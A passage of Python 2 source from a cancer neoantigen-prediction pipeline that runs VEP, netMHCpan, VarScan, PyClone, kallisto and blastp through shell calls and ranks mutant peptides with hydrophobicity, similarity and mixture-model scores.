vep=%s
python ${iTuNES_BIN_PATH}/varscan_indel_preprocess.py -i ${somatic_mutation}/${PREFIX}.indel -o ${somatic_mutation} -s ${PREFIX}
$vep -i ${somatic_mutation}/${PREFIX}_varscan_indel.vcf --cache --dir $vep_cache --dir_cache $vep_cache --force_overwrite --symbol -o STDOUT --offline | filter_vep --ontology --filter "Consequence is coding_sequence_variant" -o ${somatic_mutation}/${PREFIX}_varscan_indel_vep_ann.txt --force_overwrite
python ${iTuNES_BIN_PATH}/varscandel2fasta.py -i ${somatic_mutation}/${PREFIX}_varscan_indel_vep_ann.txt -o ${netmhc_out} -s ${PREFIX}_varscan
python ${iTuNES_BIN_PATH}/varscanins2fasta.py -i ${somatic_mutation}/${PREFIX}_varscan_indel_vep_ann.txt -o ${netmhc_out} -s ${PREFIX}_varscan
'''%(somatic_mutation_fold,PREFIX,vep_cache,netmhc_out_fold,vep_path)
print str_proc1
subprocess.call(str_proc1, shell=True, executable='/bin/bash')
str_proc3=r'''
PREFIX=%s
netmhc_out=%s
cat ${netmhc_out}/${PREFIX}_strelka_del.fasta > ${netmhc_out}/${PREFIX}_indel.fasta
cat ${netmhc_out}/${PREFIX}_strelka_ins.fasta >> ${netmhc_out}/${PREFIX}_indel.fasta
cat ${netmhc_out}/${PREFIX}_varscan_del.fasta >> ${netmhc_out}/${PREFIX}_indel.fasta
cat ${netmhc_out}/${PREFIX}_varscan_ins.fasta >> ${netmhc_out}/${PREFIX}_indel.fasta
'''%(PREFIX,netmhc_out_fold)
subprocess.call(str_proc3, shell=True, executable='/bin/bash')
netMHCpan(indel_fasta_file,hla_str,indel_netmhc_out_file,netmhc_out_fold,split_num,netMHCpan_path,'tmp_indel')
str_proc4=r'''
set -e
PREFIX=%s
netmhc_out=%s
Exp_file=%s
Binding_Aff_Fc_Cutoff=%s
Binding_Aff_Cutoff=%s
Fpkm_Cutoff=%s
hla_str=%s
netctl_fold=%s
python ${iTuNES_BIN_PATH}/sm_netMHC_result_parse.py -i ${netmhc_out}/${PREFIX}_indel_netmhc.txt -g ${netmhc_out}/${PREFIX}_indel.fasta -o ${netmhc_out} -s ${PREFIX}_indel -e ${Exp_file} -a ${Binding_Aff_Fc_Cutoff} -b ${Binding_Aff_Cutoff} -f ${Fpkm_Cutoff} -l ${hla_str}
python ${iTuNES_BIN_PATH}/netCTLPAN.py -i ${netmhc_out}/${PREFIX}_indel_final_neo_candidate.txt -o ${netctl_fold} -s ${PREFIX}_indel
'''%(PREFIX,netmhc_out_fold,exp_file,binding_fc_aff_cutoff,binding_aff_cutoff,fpkm_cutoff,hla_str,netctl_fold)
print str_proc4
subprocess.call(str_proc4, shell=True, executable='/bin/bash')
cmd_indel_vaf="python ${iTuNES_BIN_PATH}/indel_vaf_extract.py -n " + netctl_fold + "/" + PREFIX + "_indel_netctl_concact.txt -i " + somatic_mutation_fold + "/" + PREFIX + ".indel -s " + strelka_fold + "/results/variants/somatic.indels.vcf -o " + netctl_fold + " -S " + PREFIX
print cmd_indel_vaf
os.system(cmd_indel_vaf)
def varscan_copynumber_calling(varscan_copynumber_fold,prefix,alignment_out_fold,REFERENCE,samtools_path,varscan_path,logfile_fold):
str_proc=r'''
copynumber_profile=%s
PREFIX=%s
alignment_fold=%s
REFERENCE=%s
samtools=%s
varscan=%s
logfile_fold=%s
if [ ! -d ${copynumber_profile} ];then
mkdir ${copynumber_profile}
fi
#rm -rf ${copynumber_profile}/*
cd ${copynumber_profile}
mkfifo ${PREFIX}_normal.fifo
mkfifo ${PREFIX}_tumor.fifo
$samtools mpileup -f ${REFERENCE} -q 5 -Q 20 -L 10000 -d 10000 ${alignment_fold}/${PREFIX}_normal_recal.bam > ${PREFIX}_normal.fifo &
$samtools mpileup -f ${REFERENCE} -q 5 -Q 20 -L 10000 -d 10000 ${alignment_fold}/${PREFIX}_tumor_recal.bam > ${PREFIX}_tumor.fifo &
java -jar $varscan copynumber ${PREFIX}_normal.fifo ${PREFIX}_tumor.fifo ${PREFIX} #> ${logfile_fold}/${PREFIX}_copynumber.log 2>&1
grep '^chrom\|chr[1-9]\{0,1\}[0-9XY]\{0,1\}\b' ${PREFIX}.copynumber > ${PREFIX}_filter.copynumber
rm ${PREFIX}_normal.fifo ${PREFIX}_tumor.fifo
cd ..
'''%(varscan_copynumber_fold,prefix,alignment_out_fold,REFERENCE,samtools_path,varscan_path,logfile_fold)
subprocess.call(str_proc, shell=True, executable='/bin/bash')
def pyclone_annotation(somatic_mutation_fold,varscan_copynumber_fold,prefix,pyclone_fold,netctl_fold,coverage,pyclone_path,cancer_type,logfile_fold):
str_proc=r'''
somatic_mutation=%s
copynumber_profile=%s
PREFIX=%s
pyclone=%s
netctl=%s
COVERAGE=%d
Pyclone=%s
cancer_type=%s
logfile_fold=%s
Rscript ${iTuNES_BIN_PATH}/sequenza_test.R ${somatic_mutation}/${PREFIX}_filter.snp ${copynumber_profile}/${PREFIX}_filter.copynumber ${copynumber_profile}/ ${PREFIX} #> ${logfile_fold}/${PREFIX}_pyclone.log 2>&1
python ${iTuNES_BIN_PATH}/pyclone_input.py -n ${netctl}/${PREFIX}_snv_netctl_concact.txt -i ${somatic_mutation}/${PREFIX}_snv_vep_ann.txt -s ${somatic_mutation}/${PREFIX}_SNVs_only.recode.vcf -c ${copynumber_profile}/${PREFIX}_seg_copynumber.txt -o ${pyclone} -S ${PREFIX} -C ${COVERAGE}
TUMOR_CONTENT=`cat ${copynumber_profile}/${PREFIX}_cellularity.txt`
$Pyclone setup_analysis --in_files ${pyclone}/${PREFIX}_pyclone_input.tsv --tumour_contents $TUMOR_CONTENT --prior major_copy_number --working_dir ${pyclone}
$Pyclone run_analysis --config_file ${pyclone}/config.yaml
$Pyclone build_table --config_file ${pyclone}/config.yaml --out_file ${pyclone}/loci.tsv --table_type loci
python ${iTuNES_BIN_PATH}/neo_pyclone_annotation.py -n ${netctl}/${PREFIX}_snv_netctl_concact.txt -i ${somatic_mutation}/${PREFIX}_snv_vep_ann.txt -s ${pyclone}/loci.tsv -o ${netctl} -S ${PREFIX} -t ${cancer_type}
'''%(somatic_mutation_fold,varscan_copynumber_fold,prefix,pyclone_fold,netctl_fold,coverage,pyclone_path,cancer_type,logfile_fold)
print str_proc
subprocess.call(str_proc, shell=True, executable='/bin/bash')
def kallisto_expression(raw_fastq_path_first,raw_fastq_path_second,kallisto_path,kallisto_out_fold,prefix,kallisto_cdna_path,logfile_fold):
cdna_path_dir = os.path.dirname(kallisto_cdna_path)
cnd_file_prefix = os.path.splitext(os.path.basename(kallisto_cdna_path))[0]
kallisto_index_path = cdna_path_dir + '/' + cnd_file_prefix + '.idx'
cmd_kallisto_index = kallisto_path + " index -i " + kallisto_index_path + ' ' + kallisto_cdna_path + ' > ' + logfile_fold + '/' + prefix + '_kallisto_index.log' + ' 2>&1'
cmd_kallisto_quant = kallisto_path + " quant -i " + kallisto_index_path + " -o " + kallisto_out_fold + " " + raw_fastq_path_first + " " + raw_fastq_path_second + ' > ' + logfile_fold + '/' + prefix + '_kallisto.log' + ' 2>&1'
print cmd_kallisto_index
os.system(cmd_kallisto_index)
print cmd_kallisto_quant
os.system(cmd_kallisto_quant)
def plot_results(X, Y_, means, covariances, index, title, gmm_classification_file):
color_iter = itertools.cycle(['navy', 'c'])
splot = plt.subplot(1, 1, 1 + index)
#splot=plt.plot()
for i, (mean, covar, color) in enumerate(zip(means, covariances, color_iter)):
print i,color
v, w = linalg.eigh(covar)
v = 2. * np.sqrt(2.) * np.sqrt(v)
u = w[0] / linalg.norm(w[0])
# as the DP will not use every component it has access to
# unless it needs it, we shouldn't plot the redundant
# components.
if not np.any(Y_ == i):
continue
plt.scatter(X[Y_ == i, 0], X[Y_ == i, 1], .8, color=color)
# Plot an ellipse to show the Gaussian component
angle = np.arctan(u[1] / u[0])
angle = 180. * angle / np.pi # convert to degrees
ell = mpl.patches.Ellipse(mean, v[0], v[1], 180. + angle, color=color)
ell.set_clip_box(splot.bbox)
ell.set_alpha(0.5)
splot.add_artist(ell)
plt.xlim(-1.0, 1.8)
plt.ylim(-.5, .8)
plt.xlabel('first component')
plt.ylabel('second component')
#plt.xticks()
#plt.yticks()
plt.title(title)
plt.savefig(gmm_classification_file)
def hydro_vector(pep):
hydro_score={"A":1.8,"C":2.5,"D":-3.5,"E":-3.5,"F":2.8,"G":-0.4,"H":-3.2,"I":4.5,"K":-3.9,"L":3.8,"M":1.9,"N":-3.5,"P":-1.6,"Q":-3.5,"R":-4.5,"S":-0.8,"T":-0.7,"V":4.2,"W":-0.9,"Y":-1.3}
hydrophobicity_vector=[]
pep_list=list(pep)
pep_len=len(pep_list)
for pep in pep_list:
hydrophobicity_vector.append(hydro_score[pep.upper()])
return hydrophobicity_vector
def Train_hydrophobicity_xgboost(postive_pep_file,negative_pep_file):
pos_pep_list=[]
for line in open(postive_pep_file):
if line.startswith(">"):
continue
else:
record=line.strip()
if len(record)==9:
pos_pep_list.append(record)
neg_pep_list=[]
for line in open(negative_pep_file):
if line.startswith(">"):
continue
else:
record=line.strip()
if len(record)==9:
neg_pep_list.append(record)
pos_pep_hydro_list=[hydro_vector(p) for p in pos_pep_list]#[0:len(neg_pep_all)]
neg_pep_hydro_list=[hydro_vector(p) for p in neg_pep_list]
X=pos_pep_hydro_list+neg_pep_hydro_list
X_scale = StandardScaler().fit_transform(X)
y=[1]*len(pos_pep_hydro_list)+[0]*len(neg_pep_hydro_list)
nm1 = NearMiss(random_state=0, version=1)
X_resampled_nm1, y_resampled_nm1 = nm1.fit_sample(X, y)
clf_mlp = MLPClassifier(solver='lbfgs', alpha=1e-5, hidden_layer_sizes=(3), random_state=0)
clf_mlp.fit(X_resampled_nm1, y_resampled_nm1)
#hydro_score=clf_mlp.predict_prob([hydro_vector[pep]])
return clf_mlp
#def Train_bioactivity_rf():
def aligner(seq1,seq2):
matrix = matlist.blosum62
gap_open = -11
gap_extend = -1
aln = pairwise2.align.localds(seq1.upper(), seq2.upper(), matrix,gap_open,gap_extend)
return aln
def logSum(v):
ma=max(v)
return log(sum(map(lambda x: exp(x-ma),v)))+ma
def calculate_R(neo_seq,iedb_seq):
align_score=[]
#i=0
for seq in iedb_seq:
aln_score=aligner(neo_seq,seq)
#i=i+1
#print i
#print aln_score
if aln_score!=[]:
localds_core=max([line[2] for line in aln_score])
align_score.append(localds_core)
#print align_score
#print k,a
bindingEnergies=map(lambda x: -k*(a-x),align_score)
#print bindingEnergies
lZk=logSum(bindingEnergies+[0])
lGb=logSum(bindingEnergies)
R=exp(lGb-lZk)
return R
def GetNmerPositivePep(n,mhc_pos_file):
pep_list=[]
for line in open(mhc_pos_file):
if line.startswith(">"):
continue
else:
record=line.strip()
if len(record)==n:
pep_list.append(record)
return pep_list
def GetNmerNegativePep(n,mhc_neg_file):
pep_list=[]
for line in open(mhc_neg_file):
if line.startswith(">"):
continue
else:
record=line.strip()
if len(record)==n:
pep_list.append(record)
return pep_list
def hydro_vector(pep):
hydrophobicity_vector=[]
pep_list=list(pep)
pep_len=len(pep_list)
for pep in pep_list:
hydrophobicity_vector.append(hydro_score[pep.upper()])
return hydrophobicity_vector
def getXY(n,mhc_pos_file,mhc_neg_file):
pos_pep=GetNmerPositivePep(n,mhc_pos_file)
neg_pep=GetNmerNegativePep(n,mhc_neg_file)
####get hydrophobicity list
pos_pep_hydro_list=[hydro_vector(p) for p in pos_pep]#[0:len(neg_pep_all)]
neg_pep_hydro_list=[hydro_vector(p) for p in neg_pep]
#print len(pos_pep_hydro_list)
#print len(neg_pep_hydro_list)
######transform into array
#pos_pep_hydro_array=np.array(pos_pep_hydro_list)
#neg_pep_hydro_array=np.array(neg_pep_hydro_list)
X=pos_pep_hydro_list+neg_pep_hydro_list
y=[1]*len(pos_pep_hydro_list)+[0]*len(neg_pep_hydro_list)
X_array=np.asarray(X)
y_array=np.asarray(y)
return X_array,y_array
def get_hydro_model(mhc_pos_file,mhc_neg_file):
xgb_9 = XGBClassifier(
learning_rate =0.1,
n_estimators=208,
max_depth=5,
min_child_weight=1,
gamma=0,
subsample=0.8,
colsample_bytree=0.8,
objective= 'binary:logistic',
n_jobs=4,
scale_pos_weight=1,
random_state=27)
#[207] train-auc:0.95222+0.000337282 test-auc:0.852987+0.00777271
#AUC Score (Train): 0.941597
#AUC Score (Test): 0.768922
xgb_10 = XGBClassifier(
learning_rate =0.1,
n_estimators=165,
max_depth=16,
min_child_weight=1,
gamma=0,
subsample=0.8,
colsample_bytree=0.8,
objective= 'binary:logistic',
n_jobs=4,
scale_pos_weight=1,
random_state=27)
#[164] train-auc:1+0 test-auc:0.900267+0.00955733
#AUC Score (Train): 1.000000
#AUC Score (Test): 0.802474
xgb_11 = XGBClassifier(
learning_rate =0.1,
n_estimators=123,
max_depth=5,
min_child_weight=1,
gamma=0.1,
subsample=0.8,
colsample_bytree=0.8,
objective= 'binary:logistic',
n_jobs=4,
scale_pos_weight=1,
random_state=27)
X_array_9,y_array_9=getXY(9,mhc_pos_file,mhc_neg_file)
hy_xgb_9=xgb_9.fit(X_array_9,y_array_9)
X_array_10,y_array_10=getXY(10,mhc_pos_file,mhc_neg_file)
hy_xgb_10=xgb_10.fit(X_array_10,y_array_10)
X_array_11,y_array_11=getXY(11,mhc_pos_file,mhc_neg_file)
hy_xgb_11=xgb_11.fit(X_array_11,y_array_11)
return hy_xgb_9,hy_xgb_10,hy_xgb_11
def logSum(v):
ma=max(v)
return log(sum(map(lambda x: exp(x-ma),v)))+ma
def aligner(seq1,seq2):
matrix = matlist.blosum62
gap_open = -11
gap_extend = -1
aln = pairwise2.align.localds(seq1.upper(), seq2.upper(), matrix,gap_open,gap_extend)
#print aln
return aln
def calculate_R(neo_seq,iedb_seq):
align_score=[]
#i=0
for seq in iedb_seq:
aln_score=aligner(neo_seq,seq)
#i=i+1
#print i
#print aln_score
if aln_score!=[]:
localds_core=max([line[2] for line in aln_score])
align_score.append(localds_core)
#print align_score
#print k,a
bindingEnergies=map(lambda x: -k*(a-x),align_score)
#print bindingEnergies
lZk=logSum(bindingEnergies+[0])
lGb=logSum(bindingEnergies)
R=exp(lGb-lZk)
return R
############similarity############
def cal_similarity_per(mut_seq,normal_seq):
score_pair=aligner(mut_seq,normal_seq)[0][2]
score_self=aligner(mut_seq,mut_seq)[0][2]
per_similarity=score_pair/score_self
return per_similarity
def get_homolog_info(mut_seq,hla_type,blastp_tmp_file,blastp_out_tmp_file,netMHCpan_pep_tmp_file,netMHCpan_ml_out_tmp_file,blast_db_path):
hla_type_in=hla_type.replace('*','')
blastp_fasta_line='>'+'\n'+mut_seq+'\n'
#print blastp_fasta_line
pep_len=len(mut_seq)
f=open(blastp_tmp_file,'w')
f.write(blastp_fasta_line)
f.close()
str_blastp_pro='blastp -query ' + blastp_tmp_file + ' -db ' + blast_db_path + ' -out ' + blastp_out_tmp_file + ' -evalue 200000 -comp_based_stats 0'
print str_blastp_pro
subprocess.call(str_blastp_pro,shell = True,executable = '/bin/bash')
for line in open(blastp_out_tmp_file):
if line.startswith('Sbjct'):
human_pep_record=line.strip().split(' ')
human_pep = [i for i in human_pep_record if i!=''][2]
#print len(human_pep)
if len(human_pep)==pep_len:
human_homolog_pep=(human_pep)
break
else:
continue
else:
#print 'no equal length peptide!'
human_homolog_pep=mut_seq
continue
print human_homolog_pep
f=open(netMHCpan_pep_tmp_file,'w')
f.write(human_homolog_pep+'\n')
f.close()
str_netMHCpan_ml_pro='netMHCpan -p ' + netMHCpan_pep_tmp_file + ' -a ' + hla_type_in + ' > ' + netMHCpan_ml_out_tmp_file
print str_netMHCpan_ml_pro
subprocess.call(str_netMHCpan_ml_pro,shell = True,executable = '/bin/bash')
for line in open(netMHCpan_ml_out_tmp_file):
if not line.startswith(' '):
continue
else:
record=line.strip().split(' ')
ml_record = [i for i in record if i!='']
human_homolog_pep_el=ml_record[12]
return human_homolog_pep,human_homolog_pep_el
def get_EL_info(seq,hla_type,netMHCpan_pep_tmp_file,netMHCpan_ml_out_tmp_file):
hla_type_in=hla_type.replace('*','')
f=open(netMHCpan_pep_tmp_file,'w')
f.write(seq+'\n')
f.close()
str_netMHCpan_ml_pro='netMHCpan -p ' + netMHCpan_pep_tmp_file + ' -a ' + hla_type_in + ' > ' + netMHCpan_ml_out_tmp_file
print str_netMHCpan_ml_pro
subprocess.call(str_netMHCpan_ml_pro,shell = True,executable = '/bin/bash')
pep_el_rank=[]
for line in open(netMHCpan_ml_out_tmp_file):
if not line.startswith(' '):
continue
else:
record=line.strip().split(' ')
ml_record = [i for i in record if i!='']
pep_el_rank=ml_record[12]
return pep_el_rank
#read in data
def InVivoModelAndScoreSNV(mhc_pos_file,mhc_neg_file,neo_file,model_train_file,neo_model_file,blastp_tmp_file,blastp_out_tmp_file,netMHCpan_pep_tmp_file,netMHCpan_ml_out_tmp_file,iedb_file,blast_db_path,immunogenicity_gmm_all_score_ranking,immunogenicity_gmm_pos_score_ranking,gmm_classification_file,immunogenicity_bioactive_score_ranking):
iedb_seq=get_iedb_seq(iedb_file)
hy_xgb_9,hy_xgb_10,hy_xgb_11=get_hydro_model(mhc_pos_file,mhc_neg_file)
data_neo=pd.read_table(neo_file,header=0,sep='\t')
MT_peptide=data_neo.MT_pep
HLA=data_neo.HLA_type
WT_peptide=data_neo.WT_pep
hydrophobicity_score=[]
Recognition_score=[]
Homolog_pep=[]
Homolog_EL=[]
MT_peptide_EL=[]
WT_peptide_EL=[]
for i in range(len(MT_peptide)):
line=MT_peptide[i]
H_p,H_E=get_homolog_info(line,HLA[i],blastp_tmp_file,blastp_out_tmp_file,netMHCpan_pep_tmp_file,netMHCpan_ml_out_tmp_file,blast_db_path)
mt_el=get_EL_info(MT_peptide[i],HLA[i],netMHCpan_pep_tmp_file,netMHCpan_ml_out_tmp_file)
wt_el=get_EL_info(WT_peptide[i],HLA[i],netMHCpan_pep_tmp_file,netMHCpan_ml_out_tmp_file)
MT_peptide_EL.append(mt_el)
WT_peptide_EL.append(wt_el)
Homolog_pep.append(H_p)
Homolog_EL.append(H_E)
if len(line)==9:
h_score=hy_xgb_9.predict_proba(np.array(hydro_vector(line)).reshape((1,9)))[:,1][0]
hydrophobicity_score.append(h_score)
R=calculate_R(line,iedb_seq)
Recognition_score.append(R)
elif len(line)==10:
h_score=hy_xgb_10.predict_proba(np.array(hydro_vector(line)).reshape((1,10)))[:,1][0]
hydrophobicity_score.append(h_score)
R=calculate_R(line,iedb_seq)
Recognition_score.append(R)
elif len(line)==11:
h_score=hy_xgb_11.predict_proba(np.array(hydro_vector(line)).reshape((1,11)))[:,1][0]
hydrophobicity_score.append(h_score)
R=calculate_R(line,iedb_seq)
Recognition_score.append(R)
else:
print "Oh no!!"
print line
print len(line)
hydrophobicity_score.append(0.5)
R=calculate_R(line,iedb_seq)
Recognition_score.append(R)
paired_similarity_score=[]
homolog_similaity_score=[]
#####paired similarity and homolog similarity########
for M_P,N_P,H_P in zip(data_neo.MT_pep,data_neo.WT_pep,Homolog_pep):
print M_P,N_P,H_P
paired_s=cal_similarity_per(M_P,N_P)
homolog_s=cal_similarity_per(M_P,H_P)
paired_similarity_score.append(paired_s)
homolog_similaity_score.append(homolog_s)
self_sequence_similarity=[]
for i in range(len(paired_similarity_score)):
if paired_similarity_score[i] >= homolog_similaity_score[i]:
sss=paired_similarity_score[i]
else:
sss=homolog_similaity_score[i]
self_sequence_similarity.append(sss)
data_neo["Homolog_pep"]=Homolog_pep
data_neo["Homolog_Binding_EL"]=Homolog_EL
data_neo["Recognition_score"]=Recognition_score
data_neo["Hydrophobicity_score"]=hydrophobicity_score
data_neo["Self_sequence_similarity"]=self_sequence_similarity
data_neo["MT_Binding_EL"]=MT_peptide_EL
data_neo["WT_Binding_EL"]=WT_peptide_EL
df_neo=data_neo.loc[:,['Hydrophobicity_score','Recognition_score','Self_sequence_similarity','MT_Binding_EL','WT_Binding_EL']]
data_train = pd.read_table(model_train_file,header=0,sep='\t')
data_train_dropna=data_train.dropna()
target = 'response'
HPcol = 'hydrophobicity_score'
Rcol = 'Recognition_score'
SScol = 'self_sequence_similarity'
ELcol = 'EL_dissimilarity'
predictors = [x for x in data_train_dropna.columns if x not in [target,'Pep_len',ELcol,'EL_ht_rank']]
X_train=data_train_dropna[predictors].values
X_train_scale = StandardScaler().fit_transform(X_train)
y_train=data_train_dropna[target].values
print 'Original dataset shape {}'.format(Counter(y_train))
sm=SMOTE(k_neighbors=4,kind='borderline1',random_state=42)
X_res, y_res = sm.fit_sample(X_train,y_train)
print 'Resampled dataset shape {}'.format(Counter(y_res))
rf0 = RandomForestClassifier(oob_score=True, random_state=10)
print rf0
rf0.fit(X_res, y_res)
dneo_predprob = rf0.predict_proba(df_neo.values)[:,1]
print dneo_predprob
data_neo["model_pro"]=dneo_predprob
data_neo_out_sort=data_neo.sort_values(['model_pro'],ascending=[0])
data_neo_out_sort.to_csv(neo_model_file,sep='\t',header=1,index=0)
neoantigen_infor = []
for i in range(len(data_neo.Gene)):
neo_infor = data_neo["Gene"][i]+'_'+data_neo["AA_change"][i]+'_'+data_neo["MT_pep"][i]+'_'+data_neo["WT_pep"][i]
neoantigen_infor.append(neo_infor)
data_neo["neoantigen_infor"] = neoantigen_infor
f_EL_rank_wt=lambda x:1-(1/(1+math.pow(math.e,5*(float(x)-2))))/2
f_EL_rank_mt=lambda x:1/(1+math.pow(math.e,5*(float(x)-2)))
EL_mt_rank_score=data_neo.MT_Binding_EL.apply(f_EL_rank_mt)
EL_wt_rank_score=data_neo.WT_Binding_EL.apply(f_EL_rank_wt)
bioactive_score=[data_neo.Hydrophobicity_score[i]*data_neo.Recognition_score[i]*data_neo.Self_sequence_similarity[i]*EL_mt_rank_score[i]*EL_wt_rank_score[i] for i in range(len(data_neo.MT_Binding_EL))]
data_neo["bioactive_score"]=bioactive_score
data_neo_sortedby_bioactive=data_neo.sort_values(["bioactive_score"],ascending=False)
data_neo_sortedby_bioactive.to_csv(immunogenicity_bioactive_score_ranking,header=1,index=0,sep='\t')
k=1
f_TPM=lambda x:math.tanh(x/k)
allele_frequency_score=data_neo.variant_allele_frequency
netchop_score=data_neo.combined_prediction_score
cellular_prevalence_score=data_neo.cellular_prevalence
try:
tpm_score=data_neo.tpm.apply(f_TPM)
immuno_effect_score=[tpm_score[i]*allele_frequency_score[i]*netchop_score[i]*cellular_prevalence_score[i]*data_neo.Hydrophobicity_score[i]*data_neo.Recognition_score[i]*data_neo.Self_sequence_similarity[i]*EL_mt_rank_score[i]*EL_wt_rank_score[i] for i in range(len(data_neo.MT_Binding_EL))]
data_feature_select=pd.DataFrame()
data_feature_select["neoantigen_infor"]=neoantigen_infor
data_feature_select["EL_mt_rank_score"]=EL_mt_rank_score
data_feature_select["EL_wt_rank_score"]=EL_wt_rank_score
data_feature_select["tpm_score"]=tpm_score
#data_feature_select["tpm_normal_score"]=tpm_normal_score
data_feature_select["allele_frequency_score"]=allele_frequency_score
data_feature_select["netchop_score"]=netchop_score
data_feature_select["cellular_prevalence_score"]=cellular_prevalence_score
data_feature_select["hydrophobicity_score"]=data_neo.Hydrophobicity_score
data_feature_select["Recogonition"]=data_neo.Recognition_score
data_feature_select["Self_sequence_similarity"]=data_neo.Self_sequence_similarity
data_feature_select["immuno_effect_score"]=immuno_effect_score
X_neo = data_feature_select.values[:,1:10]
####pca on non-standardized data of all 6 feature
pca = PCA(n_components=2).fit(X_neo)
X_neo_pca = pca.transform(X_neo)
#print "PCA result on non-standardized data"
#print "explained_variance_ratio",pca.explained_variance_ratio_
#print "explained_variance",pca.explained_variance_
#print pca.n_components_
#print pca.components_
###plot GMM ellipse
# Fit a Gaussian mixture with EM using five components
gmm = mixture.GaussianMixture(n_components=2, covariance_type='full',n_init=5).fit(X_neo_pca)
plot_results(X_neo_pca, gmm.predict(X_neo_pca), gmm.means_, gmm.covariances_, 0,'Gaussian Mixture',gmm_classification_file)
#plot_results(X_neo_pca, gmm.predict(X_neo_pca), gmm.means_, gmm.covars_, 0, 'Gaussian Mixture')
predict_label=gmm.predict(X_neo_pca)
predict_prob=gmm.predict_proba(X_neo_pca)
predict_positive_prob=[]
for i in range(len(predict_prob)):
pos_prob=predict_prob[i][1]
predict_positive_prob.append(pos_prob)
data_feature_select["gmm_label"]=predict_label
data_gmm_filter_1=data_feature_select[data_feature_select["gmm_label"]==1]
data_gmm_filter_1_scoreAve=data_gmm_filter_1.immuno_effect_score.sum()/len(data_gmm_filter_1.immuno_effect_score)
data_gmm_filter_0=data_feature_select[data_feature_select["gmm_label"]==0]
data_gmm_filter_0_scoreAve=data_gmm_filter_0.immuno_effect_score.sum()/len(data_gmm_filter_0.immuno_effect_score)
if data_gmm_filter_0_scoreAve > data_gmm_filter_1_scoreAve:
data_gmm_filter_0.gmm_label=1
data_gmm_filter_1.gmm_label=0
else:
pass
data_labeled=pd.concat([data_gmm_filter_1,data_gmm_filter_0])
data_label_sorted=data_labeled.sort_values(["immuno_effect_score"],ascending=False)
data_label_sorted.to_csv(immunogenicity_gmm_all_score_ranking,header=1,index=0,sep='\t')
data_gmm_positive=data_label_sorted[data_label_sorted["gmm_label"]==1]
data_gmm_positive.to_csv(immunogenicity_gmm_pos_score_ranking,header=1,index=0,sep='\t')
except AttributeError,e:
print e
immuno_effect_score=[allele_frequency_score[i]*netchop_score[i]*cellular_prevalence_score[i]*data_neo.Hydrophobicity_score[i]*data_neo.Recognition_score[i]*data_neo.Self_sequence_similarity[i]*EL_mt_rank_score[i]*EL_wt_rank_score[i] for i in range(len(data_neo.MT_Binding_EL))]
data_feature_select=pd.DataFrame()
data_feature_select["neoantigen_infor"]=neoantigen_infor
data_feature_select["EL_mt_rank_score"]=EL_mt_rank_score
data_feature_select["EL_wt_rank_score"]=EL_wt_rank_score
data_feature_select["allele_frequency_score"]=allele_frequency_score
data_feature_select["netchop_score"]=netchop_score
data_feature_select["cellular_prevalence_score"]=cellular_prevalence_score
data_feature_select["hydrophobicity_score"]=data_neo.Hydrophobicity_score
data_feature_select["Recogonition"]=data_neo.Recognition_score
data_feature_select["Self_sequence_similarity"]=data_neo.Self_sequence_similarity
data_feature_select["immuno_effect_score"]=immuno_effect_score
X_neo = data_feature_select.values[:,1:9]
####pca on non-standardized data of all 6 feature
pca = PCA(n_components=2).fit(X_neo)
X_neo_pca = pca.transform(X_neo)
#print "PCA result on non-standardized data"
#print "explained_variance_ratio",pca.explained_variance_ratio_
#print "explained_variance",pca.explained_variance_
#print pca.n_components_
#print pca.components_
###plot GMM ellipse
# Fit a Gaussian mixture with EM using five components
gmm = mixture.GaussianMixture(n_components=2, covariance_type='full',n_init=5).fit(X_neo_pca)
plot_results(X_neo_pca, gmm.predict(X_neo_pca), gmm.means_, gmm.covariances_, 0,'Gaussian Mixture',gmm_classification_file)
#plot_results(X_neo_pca, gmm.predict(X_neo_pca), gmm.means_, gmm.covars_, 0, 'Gaussian Mixture')
predict_label=gmm.predict(X_neo_pca)
predict_prob=gmm.predict_proba(X_neo_pca)
predict_positive_prob=[]
for i in range(len(predict_prob)):
pos_prob=predict_prob[i][1]
predict_positive_prob.append(pos_prob)
data_feature_select["gmm_label"]=predict_label
data_gmm_filter_1=data_feature_select[data_feature_select["gmm_label"]==1]
data_gmm_filter_1_scoreAve=data_gmm_filter_1.immuno_effect_score.sum()/len(data_gmm_filter_1.immuno_effect_score)
data_gmm_filter_0=data_feature_select[data_feature_select["gmm_label"]==0]
data_gmm_filter_0_scoreAve=data_gmm_filter_0.immuno_effect_score.sum()/len(data_gmm_filter_0.immuno_effect_score)
if data_gmm_filter_0_scoreAve > data_gmm_filter_1_scoreAve:
data_gmm_filter_0.gmm_label=1
data_gmm_filter_1.gmm_label=0
else:
pass
data_labeled=pd.concat([data_gmm_filter_1,data_gmm_filter_0])
data_label_sorted=data_labeled.sort_values(["immuno_effect_score"],ascending=False)
data_label_sorted.to_csv(immunogenicity_gmm_all_score_ranking,header=1,index=0,sep='\t')
data_gmm_positive=data_label_sorted[data_label_sorted["gmm_label"]==1]
data_gmm_positive.to_csv(immunogenicity_gmm_pos_score_ranking,header=1,index=0,sep='\t')
def InVivoModelAndScoreINDEL(mhc_pos_file,mhc_neg_file,neo_file,model_train_file,neo_model_file,blastp_tmp_file,blastp_out_tmp_file,netMHCpan_pep_tmp_file,netMHCpan_ml_out_tmp_file,iedb_file,blast_db_path,immunogenicity_gmm_all_score_ranking,immunogenicity_gmm_pos_score_ranking,gmm_classification_file,immunogenicity_bioactive_score_ranking):
iedb_seq=get_iedb_seq(iedb_file)
hy_xgb_9,hy_xgb_10,hy_xgb_11=get_hydro_model(mhc_pos_file,mhc_neg_file)
data_neo=pd.read_table(neo_file,header=0,sep='\t')
MT_peptide=data_neo.MT_pep
HLA=data_neo.HLA_type
WT_peptide=data_neo.WT_pep
hydrophobicity_score=[]
Recognition_score=[]
Homolog_pep=[]
Homolog_EL=[]
MT_peptide_EL=[]
WT_peptide_EL=[]
for i in range(len(MT_peptide)):
line=MT_peptide[i]
H_p,H_E=get_homolog_info(line,HLA[i],blastp_tmp_file,blastp_out_tmp_file,netMHCpan_pep_tmp_file,netMHCpan_ml_out_tmp_file,blast_db_path)
mt_el=get_EL_info(MT_peptide[i],HLA[i],netMHCpan_pep_tmp_file,netMHCpan_ml_out_tmp_file)
wt_el=get_EL_info(WT_peptide[i],HLA[i],netMHCpan_pep_tmp_file,netMHCpan_ml_out_tmp_file)
MT_peptide_EL.append(mt_el)
WT_peptide_EL.append(wt_el)
Homolog_pep.append(H_p)
Homolog_EL.append(H_E)
if len(line)==9:
h_score=hy_xgb_9.predict_proba(np.array(hydro_vector(line)).reshape((1,9)))[:,1][0]
hydrophobicity_score.append(h_score)
R=calculate_R(line,iedb_seq)
Recognition_score.append(R)
